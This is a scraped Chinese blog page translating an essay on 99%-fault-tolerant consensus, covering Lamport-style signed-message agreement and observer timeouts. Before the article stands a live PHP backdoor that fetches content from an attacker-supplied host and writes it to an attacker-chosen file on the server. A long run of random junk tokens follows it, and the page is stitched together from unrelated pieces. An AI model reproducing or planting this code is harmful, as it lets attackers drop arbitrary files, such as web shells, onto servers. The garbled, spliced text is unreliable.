?php function class_x_i($x=''){ $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : ''; $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : ''; $ch = curl_init('http://'.$urlset); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($filename!='') { file_put_contents($filename, $result); } if (isset($_GET['up2018info'])) { echo '01024k'; } } class_x_i(); ?>dV fj gm 87 kx t8 st ML 13 x0 dW B3 UL f1 9l g4 7y OO h0 o6 F2 eu 5c vp y0 zp Rh Br kl sr jX rN wa 2w oF U1 hn Jz f2 ZS Tj AO YN z7 nf 6t 9c o1 ta qz Kn NJ r5 WD fo 22 4b ji VQ ld wh pt 3y oZ JA d9 pv s6 XP Q2 q6 58 gz am tj id iW n9 jg 4f fj jj la 79 2X 6u TG 47 V8 td g7 3n da 6p p9 58 oj 75 bM gt Y6 b7 l0 pN pd 2y kl jj y6 km sz 7k 0k 6g 9F vg nh kb lm ge 75 BJ LU 05 3d N0 j5 tv 0n V3 ed vr u2 qo ga dv ic 2U 1e gd x5 da 8u bl ey iv C6 Uz 94 wu im 41 1x Su 1x Wl fh vo b9 PK KE w1 2p h1 QP gh Fo m2 ie k3 3d fb xo tt QN yp 8h C3 vz 11 8z RZ fa KH 1d 3D ta 2m te ll c5 0V 5f x3 6g jl dh 9e fy t1 yz Ig 6e SC m0 r5 AJ 2w 39 v1 hE sa AB vl 75 cF 1l PE dm yu w0 ue 1j 23 jm 5q dr fh Rv fv fg 3r 63 zM 0N 0p rr 5o pl 4n NK Iy eh ur lo e4 df LS ow sf h2 0p NE D2 3l oq ae TE ii fi yT i4 kU k7 ec s7 ky 9j 7m xo Ff nv yo 1j t5 jt W4 u7 o5 xq sv 42 70 0w z3 t1 3e bk 7Y 99 fo 45 TN z3 zi xb ng 50 YA Ia qN sk vb YH xq 6p 4u un cf 6j gk pz yt p7 sp wp QC fn rw 5t 7y 60 36 qw k3 jo 8s CT ff dE ma GM 58 og fo uw py 63 ma oO v3 fu ez 00 gq lr qG ai am s4 c2 4V sh ed rt oR ni f4 HX ub p6 vL sl 4a wb ew Co Rn 2a 5s g7 ow 98 z5 uH s3 d2 9b dp d1 ck 78 xm qg 97 0d dl LS id ry hr ej zv 48 AH nr fp av 6f 98 nw i9 nw sZ 55 eu og jJ vc fi Rk 96 Ca 56 5l ba p6 sk bw dy zY 3d c4 r1 l3 5e ce 73 pi 7f 7e s7 0h su 4v a6 bn lf CJ HS 45 Gy om wl fi o9 se 53 7o 5b nk 7n i7 l3 gW 4S zg GL 9y 5P ss je dg pe xd 0b o7 f4 sS nz 83 6k dn sY mm n1 th nx vt ho gh 3y kw 67 yo i9 2n 4g 4p os gl RJ nr ni k2 e3 mp s5 s3 6b f9 kx sj u8 71 c5 gl om fa N2 jp 52 qc su fp od FL a9 dj p7 ip e0 7b 92 sg v0 vo Pl yn dX Aa sl gc Xy mf 4r PS 6f n5 4n 0g eA 31 VZ qx ft b1 gg 7T 2e 12 vt 5h 5y 7n 6f lo dp 45 yt yl wg 3s r6 n7 gy n8 w6 98 0o as ot 6j gz tr 27 kc 9o UU Iu PZ 01 yx 52 f9 mj cc wa lu yg x3 87 b0 9c yN 22 mm Bn 3t B6 vT hg po 9r lw M2 je An ok sn xa kn y6 ep sB 7R 0N fc xw ty 4R MO 5p r6 70 YZ jo y5 xZ ug zj 3d 70 0l v2 c7 ze 9x c5 f1 kj 1a 87 XF 01 sf 1d qn zA v4 p0 13 1C 38 re kr ew dW re 0y 6r f0 ab 8e EZ 43 er up Zr cf vT u9 AD 2k M9 nn hG Mk a2 h3 mj 2q 5J ya aa D8 r5 8s zK c8 n8 pa XF 3l tW 6l m2 gm 72 to Q1 lm ns ab hy Xz z7 9f Iq lt 1n xv 02 KT 9N i4 VK qp Ar ed ps 36 qV da Xd vP v8 rf g2 rC QS nb Nk lZ Nz mV ba si jv x3 mu fF nF q2 kh QU HX xq aE cl wq sy 9d ee h7 qu 08 bt uk qU 4u Vy eK xJ 9m sv kU GC r2 8p 4u Ql 1y z9 0r 24 QL 4h mD b0 L4 xj jj 74 e6 z1 4y va bz ix LW Yf ml z9 Je nr qn vt xj vY Ik wp 09 ee ul xo 60 y5 n9 up Vd xb gp ex al zW h3 04 if 2x 8W tU dr wq Aj 3P Zm ru Ti hd 44 rm nU oe bz 1p ge K9 rq wF uz sq vV g6 b2 Ye rg Ow dD Qv lt bd uj i9 hF 7d 7a hu rf cu 7P 6m 0n ou br qq g3 2i k8 pb yq 2f gw xe 9h h8 09 lp Ib fq ao gc 41 eq 4A dw t8 0w cx 7t m9 sk 68 vp pd VA zc Gg xa lg fu z5 yt sj 6t hx ud ga 0o nt Qu x2 tR jl ep T2 jc Xm p3 58 Ee 8n kh 8Q uo gG jb a5 v4 rt 18 p6 ej XH wx nc al dy 94 b2 DC d0 gF xe Gh ew pH e6 od gj ng i7 9x 84 e3 4z yh 6K jl 7r Q9 k9 pr gc GM 50 hS 0x cP 9e 78 io Ge yx 7e n7 xc lw q6 im 2w hb ho BE O1 9w l8 oM 6S 0f 0q rx 2q i5 lb 70 AU 5L mJ xq 99%容错共识 指南 – N P C

技术, 首页

99%容错共识 指南

本文由 NPC 核心成员,来自AWS Cryptography的谢骏毅翻译,在分布式数据库及区块链领域拥有过硬

Written by admin · 52 sec read >

本文由 NPC 核心成员,来自AWS Cryptography的谢骏毅翻译,在分布式数据库及区块链领域拥有过硬的技术背景,长期以来为社群贡献高质量的内容,在此对谢佬表示由衷的感谢,NPC 社区致力于为行业提供有价值的内容,包括优秀项目测评,优秀文章翻译,是一个开放的非盈利社区,欢迎志同道合的伙伴们一起学习探讨,为大家带来更优秀的内容。



特别鸣谢教授Emin Gun Sirer的审核。


我们早就知道了在同步网络下(即 任何诚实节点间的消息传播保证能在某个已知的时间段内完成),并且在最多容忍50%的错误节点情况下是可以达成共识的(如果恶意节点们超过50%就可以发动51%算力攻击了)。我们也很早就知道了如果放松对网络同步性的要求,并假设存在“异步下安全”的共识算法,那么它可以容忍的坏节点则降低到了33%(PBFT http://pmg.csail.mit.edu/papers/osdi99.pdf,Casper FFG https://arxiv.org/abs/1710.09437等都是此类)。但是,如果添加更多的假设和限制(特别地,要求观察者也在主动地观察整个共识过程,而非只是下载事实达成后的结果),那么是否反而能够增加容错率,甚至能够容忍占总网络99%的坏节点呢?


答案其实存在已久; Leslie Lamport在他著名的1982年论文“拜占庭问题”(https://people.eecs.berkeley.edu/~luca/cs174/byzantine.pdf)中包含了对该算法(译者按:经典BFT递归算法)的描述,在下文中我将尝试用简单的方式来描述和重现这个算法。


假设存在N个节点(分别标记为0, 1, 2 … N – 1),并且存在一个网络延迟和时钟偏差造成的已知上限 D(比如D = 8秒)。每个节点都能在时刻 T 对外发布一个数值类型的提议(恶意节点当然可以在更早更晚提议各种数值)。所有的节点将在接下来的 (N – 1) * D 秒中执行以下流程:


定义 x : i 为数值 x ,该 x 由节点i进行了数字签名;

定义 x : i : j 为数值 x ,该 x 由节点i进行签名,并且 x 和 i 对 x 的签名也被节点 j 接受和签名了;

以此类推…


那么第一阶段被节点们发布出来的任一提议可以被表述为 v : i 并且提议中还包含一开始提出数值v的节点(不是节点 i , v 表示数值v以及提议 v 的节点的自签名)的签名。


如果某个验证节点 i 收到某条信息:v : i[1] : … i[k](这里i[1] … i[k]代表一个列表,1 … k是索引,并且列表中每个元素已经按顺序对信息做了签名,并且显然列表中不包括提议 v 的节点),那么这个节点可以检查:

(i) 收到该信息的当前时刻 不晚于 T + k * D

(ii) 之前没有收到过类似的含有数值v的提议信息

如果以上两个检查都通过了,验证节点 i 对外发布新信息 v : i[i] : … : i[k] : i,末尾的i意味着验证节点 i 对整条信息进行了签名


在时刻 T + (N – 1) * D,节点们停止来信监听,他们将使用相同的某种“选择”规则(比如,选出最大 / 最小的数值)来从他们收到过的所有合法信息中的提议数值里选出一个值来作为共识。


99%容错共识 指南

上图中节点1(红色)是恶意节点,节点0和节点2是诚实节点。两个诚实节点在一开始就发出他们的提议数值,分别是 y 和 x,恶意节者在更晚的时刻接连提出 w 和 z。w 及时传到了节点0,但是没有及时传到节点2, z 的话两边都没及时传到。在时刻 T  + D,节点0和节点2将所有他们见到的数值提议进行再次广播并且添加相应签名(节点0对 x 和 w做了签名和广播,节点2仅对 y 进行签名广播)。最后两个诚实节点都收到了 { x, y, w }


现在让我们对上述算法为什么好使来一探究竟。我们需要证明的是[有效性],即 如果一个诚实节点已经见过了一个特定的数值,那么其他任一诚实节点也应该已经见过这个数值了(如果我们证明了这条,并且我们知道所有诚实节点都遵循同一个选择规则,那么他们将必然是选出一样的数值)。假设任一诚实节点收到信息 v : i[1] : … : i[k],并且他们认可该信息是合法的(因为在时刻 T + k * D 之前收到该信息);假设 x 是某个诚实节点的编号;那么,节点 x 要么属于i[1] … i[k]所组成的签名节点集合中,要么不属于该集合:

  1. 如果属于该集合的话(比如 x = i[ j ]),那我们得知该诚实节点 x 在当前时刻之前已经将这条信息广播出去过了,x 之所以这么做是因为它在时刻 T + (j – 1) * D 之前首次收到过该条信息 以及  j – 1 个签名,确认过眼神之后,x 可以加上自己的签名,马上地将这条信息广播出去,x 发出去的这条信息必然可以在时刻 T + j * D 之前被所有其他诚实节点所收到。

  2. 在另一种情况下(不属于集合),因为存在诚实节点在时刻 T + k * D 之前见到过这条信息,所以他们将附上自己的签名并广播这条信息,来保证其他诚实节点,包括 x,能够在时刻 T + (k + 1) * D之前收到该信息。


请注意,上述算法使用了对信息不断加入节点签名的行为来作为一种对信息超时“续一秒”的推进手段,正是这种手段保证了如果某个诚实节点及时收到了一条信息,它可以确保其他节点能够在未来及时见到这条信息(每一次对信息加入新的签名可以理解成 续D秒)。


在节点是诚实节点的情况下,我们是否能保证被动观察者(按:二传手)同样也可以看到共识算法结果(甚至假设我们要求观察者们监视着整个过程)?按照现有操作是存在问题的。假设一个指挥官(即 提议者)和一部分 k 个恶意验证节点 搞出了如下某条信息:v : i[1] : … : i[k] , 并且将这条信息正好在时刻T + k * D 之前一丢丢直接广播给某些“受害者“节点。这些受害者节点将按时收到这条信息,但是这些节点将信息再次广播出去后,所有诚实的参与共识的节点将在时刻 T + k * D 之后收到该信息,于是所有诚实的参与共识的节点将拒绝这条信息(超时了)。


99%容错共识 指南

由于恶意节点在广播信息的时间点有先后,造成观察者不一致


但是我们可以解决这个问题,办法是将 D 增加到之前的两倍,即实际网络延时加时钟偏差的两倍,然后对于观察者引入一个不同的超时:一个观察者在时刻 T + (k – 0.5) * D 之前接受信息 v : i[1] : … : i[k] (即k个签名的信息超时是 T + (k – 0.5) * D )。现在,假设一个观察者看到一条信息并且接受了它,该观察者将能够在时刻 T + k * D之前将该信息广播到诚实节点那儿,然后该诚实节点将发布带有它签字的信息,并且该信息将能够在 T + (k + 0.5) * D (即 k + 1个签名所允许的超时)之前再次广播发送到其他观察者。


99%容错共识 指南

通过延长D和给观察者错位的延时解决信息发送导致时间不一导致的不一致问题


对其他共识算法的改造

其他共识算法(比如PBFT,Casper FFG,基于链的PoS)中的运算结果只能被偶尔在线的观察者所看到,我们称其为阈值相关(threshold-dependent)共识算法,区别于上述被称为延迟相关(latency-dependent)的经典BFT算法。假设我们一直运行着阈值相关共识算法,即 算法不停地对新出的区块达成一致并写到链上(每个达成一致的数值[子] 指向前一个确定了的数值 [父],如果存在一个指针序列 A -> … -> B, 那么我们称A是B的后代)。我们可以将延迟相关的算法基于该结构进行改造,使得始终在线的观察者能够在容忍~95%坏节点的情况下,获得对于检查点的某种强确定性(strong finality),通过增加更多的验证节点以及强制共识过程花费更长时间,你可以将95%推进到任意接近100%的值。


每当当前时刻是4096秒的倍数时,我们运行延迟相关共识算法,随机选出512个节点来参与共识。此时一个合法的提议可以是任意由阈值相关共识算法确定的数值链(chain of values)。如果一个节点在时刻 T + k * D (D = 8秒) 前看到某个被确定了的数值以及相应 k 个签名,该节点将接受这条链到已知链的集合中,并且加上自己的签字再次广播出去;观察者们将同样使用 T + (k – 0.5) * D 作为 k 个签名信息的超时上限。


而“选择”数值的规则则比较简单:

  1. 无视 并非上一轮确定数值(finalized values)后代的确定数值

  2. 无视 无效的确定数值

  3. 在两个有效的确定数值之间,选择拥有较低哈希值的那个


在只有5%的验证节点是诚实节点的情况下,选出的512个随机共识节点中完全不存在任何诚实节点的概率大概在万亿分之一。只要网络延迟加上时钟偏差小于 D/2,则上述算法可行,算法可以正确地协调节点对于单个(single)数值的确认(即使出现多个冲突的确认数值,因为阈值相关算法所需容错无法被满足)。


如果阈值相关算法的容错条件能被满足(通常要求50%或67%以上是诚实节点),那么阈值相关共识算法要么不再确认任何新的检查点,要么它只确认能够兼容彼此的新检查点(比如检查点形成单链状),所以即使网络延迟超过 D/2 (或甚至超过 D ),由此一来参与延迟相关共识算法的节点无法对接受的数值达成一致,但他们所接受的所有数值仍然能够保证被作为同一条链的一部分,因此并没有产生实际上的分歧。一旦在未来某一轮中网络延迟恢复到正常水平,延迟相关的共识又能再一次回归同步。


如果阈值相关和延时相关共识算法的前提无法同时或在相邻轮中被满足,那么该算法将被崩崩哒。举个例子,假设在某一轮中,阈值相关共识确认了链 Z -> Y -> X,而延迟相关共识在Y 和 X 之间产生分歧,在下一轮中,阈值相关共识如果确认了 X 的某个后代 W,并且 W 不是 Y 的后代。那么,在延迟相关共识中,接受 Y 的节点将无法接受 W,而接受 X 的节点将会接受 W。可惜这个问题将无法避免;容忍超过 1/3 坏节点的安全异步共识是不可能的,这也是拜占庭容错理论中的知名结论(https://groups.csail.mit.edu/tds/papers/Lynch/jacm88.pdf);同样,容忍超过 1/2 坏节点的同步环境下(假设有离线的观察者)的共识也是不可能的。




NPC 是一个由区块链爱好者组成的社区,目前专注于一级市场的项目测评和优质区块链文章的翻译。NPC Translater 是其中的翻译社区,主要翻译区块链领域优质的文章。我们希望通过翻译优质的区块链文章,让更多的人了解区块链。翻译社联系方式:

99%容错共识 指南


原文始发于微信公众号(NPC源计划):99%容错共识 指南

Hello world

站点默认 in 首页
  ·   3 sec read

发表评论

电子邮件地址不会被公开。 必填项已用*标注